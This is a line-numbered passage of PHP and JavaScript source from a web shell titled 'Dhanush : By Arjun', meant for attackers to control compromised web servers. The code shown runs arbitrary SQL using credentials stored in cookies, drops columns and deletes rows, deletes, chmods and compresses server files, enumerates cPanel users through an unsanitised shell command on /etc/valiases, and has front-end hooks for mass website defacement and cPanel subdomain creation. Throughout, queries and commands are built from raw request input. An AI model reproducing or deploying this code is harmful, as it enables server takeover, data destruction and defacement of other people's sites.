5708 $dbname = $_GET['dbname'];
5709 $tablename = $_GET['tablename'];
5710 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5711 mysql_select_db($dbname);
5712 mysql_query("delete from $tablename");
5713 listtable();
5714 }
5715
5716 // Empty Tables
5717 if($_GET['action'] == "dropField")
5718 {
5719 $dbserver = $_COOKIE["dbserver"];
5720 $dbuser = $_COOKIE["dbuser"];
5721 $dbpass = $_COOKIE["dbpass"];
5722 $dbname = $_GET['dbname'];
5723 $tablename = $_GET['tablename'];
5724 $fieldname = $_GET['fieldname'];
5725 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5726 mysql_select_db($dbname);
5727 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
5728 mysql_select_db( $dbname, $mysqlHandle );
5729 mysql_query( $queryStr , $mysqlHandle );
5730 listtable();
5731 }
5732
5733 if($_GET['action'] == 'viewdb')
5734 {
5735 listdatabase();
5736 }
5737
5738 // View Table Schema
5739 if($_GET['action'] == "viewSchema")
5740 {
5741 $dbserver = $_COOKIE["dbserver"];
5742 $dbuser = $_COOKIE["dbuser"];
5743 $dbpass = $_COOKIE["dbpass"];
5744 $dbname = $_GET['dbname'];
5745 $tablename = $_GET['tablename'];
5746 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5747 mysql_select_db($dbname);
5748 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5749 $pResult = mysql_query( "SHOW fields FROM $tablename" );
5750 $num = mysql_num_rows( $pResult );
5751 echo "<br><br><table class=btmtbl align=center cellspacing=4 style='width:80%;' border=1>";
5752 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
5753 for( $i = 0; $i < $num; $i++ )
5754 {
5755 $field = mysql_fetch_array( $pResult );
5756 echo "<tr>\n";
5757 echo "<td>".$field["Field"]."</td>\n";
5758 echo "<td>".$field["Type"]."</td>\n";
5759 echo "<td>".$field["Null"]."</td>\n";
5760 echo "<td>".$field["Key"]."</td>\n";
5761 echo "<td>".$field["Default"]."</td>\n";
5762 echo "<td>".$field["Extra"]."</td>\n";
5763 $fieldname = $field["Field"];
5764 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
5765 echo "</tr>\n";
5766 }
5767 echo "</table>";
5768 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5769 }
5770
5771 // Execute Query
5772 if($_GET['action'] == "executequery")
5773 {
5774 $dbserver = $_COOKIE["dbserver"];
5775 $dbuser = $_COOKIE["dbuser"];
5776 $dbpass = $_COOKIE["dbpass"];
5777 $dbname = $_GET['dbname'];
5778 $tablename = $_GET['tablename'];
5779 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5780 mysql_select_db($dbname);
5781 $result = mysql_query($_GET['executemyquery']);
5782
5783 // results
5784 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
5785
5786 $count = 0;
5787 while ($row = mysql_fetch_assoc($result))
5788 {
5789 echo "<tr>\r\n";
5790
5791 if ($count==0) // list column names
5792 {
5793 echo "<tr>\r\n";
5794 while($key = key($row))
5795 {
5796 echo "<td><b>" . $key . "</b></td>\r\n";
5797 next($row);
5798 }
5799 echo "</tr>\r\n";
5800 }
5801
5802 foreach($row as $r) // list content of column names
5803 {
5804 if ($r=='') $r = '<font >NULL</font>';
5805 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
5806 }
5807 echo "</tr>\r\n";
5808 $count++;
5809 }
5810 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
5811 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5812 }
5813
5814 // View Table Data
5815 if($_GET['action'] == "viewdata")
5816 {
5817 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
5818 $dbserver = $_COOKIE["dbserver"];
5819 $dbuser = $_COOKIE["dbuser"];
5820 $dbpass = $_COOKIE["dbpass"];
5821 $dbname = $_GET['dbname'];
5822 $tablename = $_GET['tablename'];
5823 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5824 ?>
5825 <br><br>
5826 <form>
5827 <table>
5828 <tr>
5829 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
5830 </tr>
5831 <tr>
5832 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
5833 </tr>
5834 </table>
5835 </form>
5836 <?php
5837 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5838 mysql_select_db($dbname);
5839
5840 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
5841 $row = mysql_fetch_array($sql);
5842 $rowid = $row['COLUMN_NAME'];
5843
5844 echo "<br><font size=4>Data in Table</font><br>";
5845 if( $tablename != "" )
5846 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
5847 else
5848 echo "<font size=3 class=txt>$dbname</font><br>";
5849
5850 $queryStr = "";
5851 $pag = 0;
5852 $queryStr = stripslashes( $queryStr );
5853 if( $queryStr == "" )
5854 {
5855 if(isset($_REQUEST['page']))
5856 {
5857 $res = mysql_query("select * from $tablename");
5858 $getres = mysql_num_rows($res);
5859 $coun = ceil($getres/30);
5860 if($_REQUEST['page'] != 1)
5861
5862 $pag = $_REQUEST['page'] * 30;
5863 else
5864 $pag = $_REQUEST['page'] * 30;
5865
5866 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
5867 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
5868 $arrcount = 1;
5869 $arrdata[$arrcount] = 0;
5870 while($row = mysql_fetch_array($sql))
5871 {
5872 $arrdata[$arrcount] = $row[$rowid];
5873 $arrcount++;
5874 }
5875 }
5876 else
5877 {
5878 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
5879 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
5880 $arrcount = 1;
5881 $arrdata[$arrcount] = 0;
5882 while($row = mysql_fetch_array($sql))
5883 {
5884 $arrdata[$arrcount] = $row[$rowid];
5885 $arrcount++;
5886 }
5887 }
5888 if( $orderby != "" )
5889 $queryStr .= " ORDER BY $orderby";
5890 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
5891 }
5892
5893
5894 $pResult = mysql_query($queryStr );
5895 $fieldt = mysql_fetch_field($pResult);
5896 $tablename = $fieldt->table;
5897 $errMsg = mysql_error();
5898
5899 $GLOBALS[queryStr] = $queryStr;
5900
5901 if( $pResult == false )
5902 {
5903 echoQueryResult();
5904 return;
5905 }
5906 if( $pResult == 1 )
5907 {
5908 $errMsg = "Success";
5909 echoQueryResult();
5910 return;
5911 }
5912
5913 echo "<hr color='#1B1B1B'>\n";
5914
5915 $row = mysql_num_rows( $pResult );
5916 $col = mysql_num_fields( $pResult );
5917
5918 if( $row == 0 )
5919 {
5920 echo "<font size=3>No Data Exist!</font>";
5921 return;
5922 }
5923
5924 if( $rowperpage == "" ) $rowperpage = 30;
5925 if( $page == "" ) $page = 0;
5926 else $page--;
5927 mysql_data_seek( $pResult, $page * $rowperpage );
5928
5929 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 align=center>\n";
5930 echo "<tr>\n";
5931 for( $i = 0; $i < $col; $i++ )
5932 {
5933 $field = mysql_fetch_field( $pResult, $i );
5934 echo "<th>";
5935 if($action == "viewdata")
5936 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
5937 else
5938 echo $field->name."\n";
5939 echo "</th>\n";
5940 }
5941 echo "<th colspan=2>Action</th>\n";
5942 echo "</tr>\n";
5943 $num=1;
5944
5945
5946 $acount = 1;
5947
5948 for( $i = 0; $i < $rowperpage; $i++ )
5949 {
5950 $rowArray = mysql_fetch_row( $pResult );
5951 if( $rowArray == false ) break;
5952 echo "<tr>\n";
5953 $key = "";
5954 for( $j = 0; $j < $col; $j++ )
5955 {
5956 $data = $rowArray[$j];
5957
5958 $field = mysql_fetch_field( $pResult, $j );
5959 if( $field->primary_key == 1 )
5960 $key .= "&" . $field->name . "=" . $data;
5961
5962 if( strlen( $data ) > 30 )
5963 $data = substr( $data, 0, 30 ) . "...";
5964 $data = htmlspecialchars( $data );
5965 echo "<td>\n";
5966 echo "<font class=txt>$data</font>\n";
5967 echo "</td>\n";
5968 }
5969
5970 if(!is_numeric($arrdata[$acount]))
5971 echo "<td colspan=2>No Key</td>\n";
5972 else
5973 {
5974 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
5975 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
5976 $acount++;
5977 }
5978 }
5979 echo "</tr>\n";
5980
5981
5982 echo "</table>";
5983 if($arrcount > 30)
5984 {
5985 $res = mysql_query("select * from $tablename");
5986 $getres = mysql_num_rows($res);
5987 $coun = ceil($getres/30);
5988 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
5989 for($i=0;$i<$coun;$i++)
5990 echo "<option value=$i>$i</option>";
5991
5992 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
5993 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5994 }
5995 }
5996
5997 // Delete Table Data
5998 if($_GET['action'] == "deleteData")
5999 {
6000 $dbserver = $_COOKIE["dbserver"];
6001 $dbuser = $_COOKIE["dbuser"];
6002 $dbpass = $_COOKIE["dbpass"];
6003 $dbname = $_GET['dbname'];
6004 $tablename = $_GET['tablename'];
6005 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6006 mysql_select_db($dbname);
6007 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6008 $row = mysql_fetch_array($sql);
6009 $row = $row['COLUMN_NAME'];
6010 $rowid = $_GET[$row];
6011 mysql_query("delete from $tablename where $row = '$rowid'");
6012 listtable();
6013 }
6014 // Edit Table Data
6015 if($_GET['action'] == "editData")
6016 {
6017 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
6018 $dbserver = $_COOKIE["dbserver"];
6019 $dbuser = $_COOKIE["dbuser"];
6020 $dbpass = $_COOKIE["dbpass"];
6021 $dbname = $_GET['dbname'];
6022 $tablename = $_GET['tablename'];
6023 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6024 ?>
6025 <br><br>
6026 <form action="<?php echo $self; ?>" method="post">
6027 <?php
6028 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6029 mysql_select_db($dbname);
6030
6031 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6032 $row = mysql_fetch_array($sql);
6033 $row = $row['COLUMN_NAME'];
6034 $rowid = $_GET[$row];
6035
6036 $pResult = mysql_list_fields( $dbname, $tablename );
6037 $num = mysql_num_fields( $pResult );
6038
6039 $key = "";
6040 for( $i = 0; $i < $num; $i++ )
6041 {
6042 $field = mysql_fetch_field( $pResult, $i );
6043 if( $field->primary_key == 1 )
6044 if( $field->numeric == 1 )
6045 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
6046 else
6047 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
6048 }
6049 $key = substr( $key, 0, strlen($key)-4 );
6050
6051 mysql_select_db( $dbname, $mysqlHandle );
6052 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
6053 $data = mysql_fetch_array( $pResult );
6054
6055 echo "<table class=btmtbl cellspacing=1 cellpadding=2 border=1>\n";
6056 echo "<tr>\n";
6057 echo "<th>Name</th>\n";
6058 echo "<th>Type</th>\n";
6059 echo "<th>Function</th>\n";
6060 echo "<th>Data</th>\n";
6061 echo "</tr>\n";
6062
6063 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6064 $num = mysql_num_rows( $pResult );
6065
6066 $pResultLen = mysql_list_fields( $dbname, $tablename );
6067 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
6068 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
6069 for( $i = 0; $i < $num; $i++ )
6070 {
6071 $field = mysql_fetch_array( $pResult );
6072 $fieldname = $field["Field"];
6073 $fieldtype = $field["Type"];
6074 $len = mysql_field_len( $pResultLen, $i );
6075
6076 echo "<tr>";
6077 echo "<td>$fieldname</td>";
6078 echo "<td>".$field["Type"]."</td>";
6079 echo "<td>\n";
6080 echo "<select name=${fieldname}_function class=sbox>\n";
6081 echo "<option>\n";
6082 echo "<option>ASCII\n";
6083 echo "<option>CHAR\n";
6084 echo "<option>SOUNDEX\n";
6085 echo "<option>CURDATE\n";
6086 echo "<option>CURTIME\n";
6087 echo "<option>FROM_DAYS\n";
6088 echo "<option>FROM_UNIXTIME\n";
6089 echo "<option>NOW\n";
6090 echo "<option>PASSWORD\n";
6091 echo "<option>PERIOD_ADD\n";
6092 echo "<option>PERIOD_DIFF\n";
6093 echo "<option>TO_DAYS\n";
6094 echo "<option>USER\n";
6095 echo "<option>WEEKDAY\n";
6096 echo "<option>RAND\n";
6097 echo "</select>\n";
6098 echo "</td>\n";
6099 $value = htmlspecialchars($data[$i]);
6100 $type = strtok( $fieldtype, " (,)\n" );
6101 if( $type == "enum" || $type == "set" )
6102 {
6103 echo "<td>\n";
6104 if( $type == "enum" )
6105 echo "<select name=$fieldname class=box>\n";
6106 else if( $type == "set" )
6107 echo "<select name=$fieldname size=4 class=box multiple>\n";
6108 while( $str = strtok( "'" ) )
6109 {
6110 if( $value == $str )
6111 echo "<option selected>$str\n";
6112 else
6113 echo "<option>$str\n";
6114 strtok( "'" );
6115 }
6116 echo "</select>\n";
6117 echo "</td>\n";
6118 }
6119 else
6120 {
6121 if( $len < 40 )
6122 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
6123 else
6124 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
6125 }
6126 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6127 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6128 echo "</tr>";
6129 }
6130 $fundata1=eregi_replace(',$', '', $fundata1);
6131 $fundata2=eregi_replace(',$', '', $fundata2);
6132
6133 echo "</table><p>\n";
6134 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
6135 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
6136 echo "</form>\n";
6137 }
6138 }
6139// Edit Submit Table Data
6140else if($_REQUEST['action'] == "editsubmitData")
6141{
6142 $dbserver = $_COOKIE["dbserver"];
6143 $dbuser = $_COOKIE["dbuser"];
6144 $dbpass = $_COOKIE["dbpass"];
6145 $dbname = $_POST['dbname'];
6146 $tablename = $_POST['tablename'];
6147
6148 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6149 mysql_select_db($dbname);
6150
6151 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6152 $row = mysql_fetch_array($sql);
6153 $row = $row['COLUMN_NAME'];
6154 $rowid = $_POST[$row];
6155
6156 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6157 $num = mysql_num_rows( $pResult );
6158
6159 $rowcount = $num;
6160
6161 $pResultLen = mysql_list_fields( $dbname, $tablename );
6162
6163 for( $i = 0; $i < $num; $i++ )
6164 {
6165 $field = mysql_fetch_array( $pResult );
6166 $fieldname = $field["Field"];
6167 $arrdata = $_REQUEST[$fieldname];
6168
6169 $str .= " " . $fieldname . " = '" . $arrdata . "'";
6170 $rowcount--;
6171 if($rowcount != 0)
6172 $str .= ",";
6173 }
6174
6175 $str = "update $tablename set" . $str . " where $row=$rowid";
6176 mysql_query($str);
6177 ?><div id="showsql"></div><?php
6178}
6179// Insert Table Data
6180else if($_REQUEST['action'] == "insertdata")
6181{
6182 $dbserver = $_COOKIE["dbserver"];
6183 $dbuser = $_COOKIE["dbuser"];
6184 $dbpass = $_COOKIE["dbpass"];
6185 $dbname = $_POST['dbname'];
6186 $tablename = $_POST['tablename'];
6187
6188 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6189 mysql_select_db($dbname);
6190
6191 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6192 $row = mysql_fetch_array($sql);
6193 $row = $row['COLUMN_NAME'];
6194 $rowid = $_POST[$row];
6195
6196 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6197 $num = mysql_num_rows( $pResult );
6198
6199 $rowcount = $num;
6200
6201 $pResultLen = mysql_list_fields( $dbname, $tablename );
6202
6203 for( $i = 0; $i < $num; $i++ )
6204 {
6205 $field = mysql_fetch_array( $pResult );
6206 $fieldname = $field["Field"];
6207 $arrdata = $_REQUEST[$fieldname];
6208
6209 $str1 .= "".$fieldname . ",";
6210 $str2 .= "'".$arrdata . "',";
6211 $rowcount--;
6212 if($rowcount != 0)
6213 {
6214 //$str1 .= $fieldname . ",";
6215 //$str2 .= $arrdata . ",";
6216 }
6217 }
6218 $str1=eregi_replace(',$', '', $str1);
6219 $str2=eregi_replace(',$', '', $str2);
6220 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
6221 mysql_query($str);
6222
6223 ?><div id="showsql"></div><?php
6224}
6225else if(isset($_GET['logoutdb']))
6226{
6227 setcookie("dbserver",time() - 60*60);
6228 setcookie("dbuser",time() - 60*60);
6229 setcookie("dbpass",time() - 60*60);
6230 header("Location:$self");
6231}
6232else if(isset($_POST['choice']))
6233{
6234 if($_POST['choice'] == "delete")
6235 {
6236 $actbox = $_POST["actbox"];
6237 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6238
6239 foreach ($actbox as $myv)
6240 $myv = explode(",",$myv);
6241 foreach ($myv as $v)
6242 {
6243 if(is_file($v))
6244 {
6245 if(unlink($v))
6246 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
6247 else
6248 echo "<br><center>Cannot Delete File $v</center>";
6249 }
6250 else if(is_dir($v))
6251 {
6252 rrmdir($v);
6253 }
6254 }
6255 echo '<br>';
6256 }
6257 else if($_POST['choice'] == "chmod")
6258 { ?>
6259 <BR><form id="chform"><?php
6260 $actbox1 = $_POST['actbox'];
6261 foreach ($actbox1 as $myv)
6262 $myv = explode(",",$myv);
6263 foreach ($myv as $v)
6264 { ?>
6265 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
6266 <?php }
6267 ?>
6268 <table align="center" border="3" style="width:40%; border-color:#333333;">
6269 <tr>
6270 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
6271 </tr>
6272 <tr>
6273 <td colspan="2" align="center" style="height:60px">
6274 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" />
6275 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" /></form></center>
6276 </td>
6277 </tr>
6278 </table>
6279
6280 </form> <?php
6281 }
6282 else if($_POST['choice'] == "changefileperms")
6283 {
6284 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
6285 {
6286 $actbox = $_POST["actbox"];
6287 foreach ($actbox as $myv)
6288 $myv = explode(",",$myv);
6289 foreach ($myv as $v)
6290 {
6291 if(is_file($v) || is_dir($v))
6292 {
6293 $perms = 0;
6294 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
6295 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
6296 echo "<div align=left style=width:60%;>";
6297 if(@chmod($v,$perms))
6298 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
6299 else
6300 echo "Cannot Change $v File Permissions<br>";
6301 echo "</div>";
6302 }
6303 }
6304
6305 }
6306 }
6307 else if($_POST['choice'] == "compre")
6308 {
6309 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6310 $actbox = $_POST["actbox"];
6311 foreach ($actbox as $myv)
6312 $myv = explode(",",$myv);
6313 foreach ($myv as $v)
6314 {
6315 if(is_file($v))
6316 {
6317 $zip = new ZipArchive();
6318 $filename= basename($v) . '.zip';
6319 if(($zip->open($filename, ZipArchive::CREATE))!==true)
6320 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
6321 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
6322 $zip->addFile(basename($v));
6323 $zip->close();
6324 }
6325 else if(is_dir($v))
6326 {
6327 if($os == "Linux")
6328 {
6329 $filename= basename($v);
6330 execmd("tar --create --recursion --file=$filename.tar $v");
6331 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
6332 }
6333 else
6334 echo "<BR>Cannot compress directory<BR><BR>";
6335 }
6336 }
6337 echo '<BR><BR>';
6338 }
6339 else if($_POST['choice'] == "uncompre")
6340 {
6341 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6342 $actbox = $_POST["actbox"];
6343 foreach ($actbox as $myv)
6344 $myv = explode(",",$myv);
6345 foreach ($myv as $v)
6346 {
6347 if(is_file($v) || is_dir($v))
6348 {
6349 $zip = new ZipArchive;
6350 $filename= basename($v);
6351 $res = $zip->open($filename);
6352 if ($res === TRUE)
6353 {
6354 $pieces = explode(".",$filename);
6355 $zip->extractTo($pieces[0]);
6356 $zip->close();
6357 echo '<BR><font class=txt size=3>File '.$v.' Unzipped successfully</font>';
6358 } else
6359 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
6360 }
6361 }
6362 echo '<BR><BR>';
6363 }
6364}
6365else if(isset($_GET['sitename']))
6366{
6367 $sitename = str_replace("http://","",$_GET['sitename']);
6368 $sitename = str_replace("http://www.","",$sitename);
6369 $sitename = str_replace("www.","",$sitename);
6370 $show = myexe("ls -la /etc/valiases/".$sitename);
6371 if(!empty($show))
6372 echo $show;
6373 else
6374 echo "Cannot get the username";
6375}
6376else if(isset($_GET['mydata']))
6377{
6378 listdatabase();
6379}
6380else if(isset($_GET['home']))
6381{
6382 mainfun($_GET['home']);
6383}
6384else if(isset($_GET['dir']))
6385{
6386 mainfun($_GET['myfilepath']);
6387}
6388else if(isset($_GET['mydirpath']))
6389{
6390 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
6391}
6392else
6393{
6394?>
6395<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
6396<title>Dhanush : By Arjun</title>
6397<script type="text/javascript">
6398checked = false;
6399var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
6400function checkedAll ()
6401{
6402 if (checked == false){checked = true}else{checked = false}
6403 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
6404 {
6405 document.getElementById('myform').elements[i].checked = checked;
6406 }
6407}
6408function change_style(mystyle)
6409{
6410 window.location.href = '<?php echo $self; ?>?style='+mystyle;
6411}
6412function createsubdomain(cpaneluser,cpanelpass,noofsubdomain,subindex)
6413{
6414 var params = "cpaneluser="+cpaneluser+"&cpanelpass="+cpanelpass+"&noofsubdomain="+noofsubdomain+"&subindex="+subindex;
6415 document.getElementById("showmydata").innerHTML=waitstate;
6416 var ajaxRequest;
6417 ajaxRequest = new XMLHttpRequest();
6418
6419 ajaxRequest.onreadystatechange = function()
6420 {
6421 if(ajaxRequest.readyState == 3)
6422 {
6423 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6424 }
6425 }
6426
6427 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6428 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6429 ajaxRequest.send(params);
6430}
6431function massdeface(script,masswpdef,wpsym)
6432{
6433 var params = "massscript="+script+"&massdef="+masswpdef+"&wpsym="+wpsym;
6434 document.getElementById("showdef").innerHTML="<center><marquee scrollamount=4 width=150>It may take long time. Wait....</marquee></center>";
6435 var ajaxRequest;
6436 ajaxRequest = new XMLHttpRequest();
6437
6438 ajaxRequest.onreadystatechange = function()
6439 {
6440 if(ajaxRequest.readyState == 3)
6441 {
6442 document.getElementById("showdef").innerHTML=ajaxRequest.responseText;
6443 }
6444 }
6445
6446 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6447 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6448 ajaxRequest.send(params);
6449}
6450function urlchange(myfilepath)
6451{
6452 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
6453 splitter = "<?php echo addslashes($directorysperator); ?>";
6454 mypath = mpath = myfilepath.split(splitter);
6455 <?php if($os == "Linux") { ?>
6456 r = "/";
6457 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
6458 <?php } ?>
6459 for (i = 0; i < mypath.length; i++)
6460 {
6461 if(mypath[i] == "")
6462 continue;
6463 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
6464
6465 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
6466 }
6467 myurl = myurl.replace(/\\/g,"\\\\");
6468 return myurl;
6469}
6470function wrtblDIR(mydirpath)
6471{
6472 var ajaxRequest;
6473 ajaxRequest = new XMLHttpRequest();
6474
6475 ajaxRequest.onreadystatechange = function()
6476 {
6477 if(ajaxRequest.readyState == 4)
6478 {
6479 for(i=0;i<=3;i++)
6480 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
6481 }
6482 }
6483
6484 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydirpath="+mydirpath, true);
6485 ajaxRequest.send(null);
6486}
6487function setpath(myfilpath)
6488{
6489 wrtblDIR(myfilpath);
6490 document.getElementById("path").value=myfilpath;
6491 document.getElementById("createfile").value=myfilpath;
6492 document.getElementById("readfile").value=myfilpath;
6493 document.getElementById("readdir").value=myfilpath;
6494 document.getElementById("createfolder").value=myfilpath;
6495 document.getElementById("createfolder").value=myfilpath;
6496 document.getElementById("exepath").value=myfilpath;
6497 document.getElementById("auexepath").value=myfilpath;
6498 document.getElementById("showdir").innerHTML="";
6499}
6500function changedir(myaction,myfilepath)
6501{
6502 var myurl = urlchange(myfilepath);
6503
6504 document.getElementById("showmaindata").innerHTML=waitstate;
6505 var ajaxRequest;
6506 ajaxRequest = new XMLHttpRequest();
6507
6508 ajaxRequest.onreadystatechange = function()
6509 {
6510 if(ajaxRequest.readyState == 4)
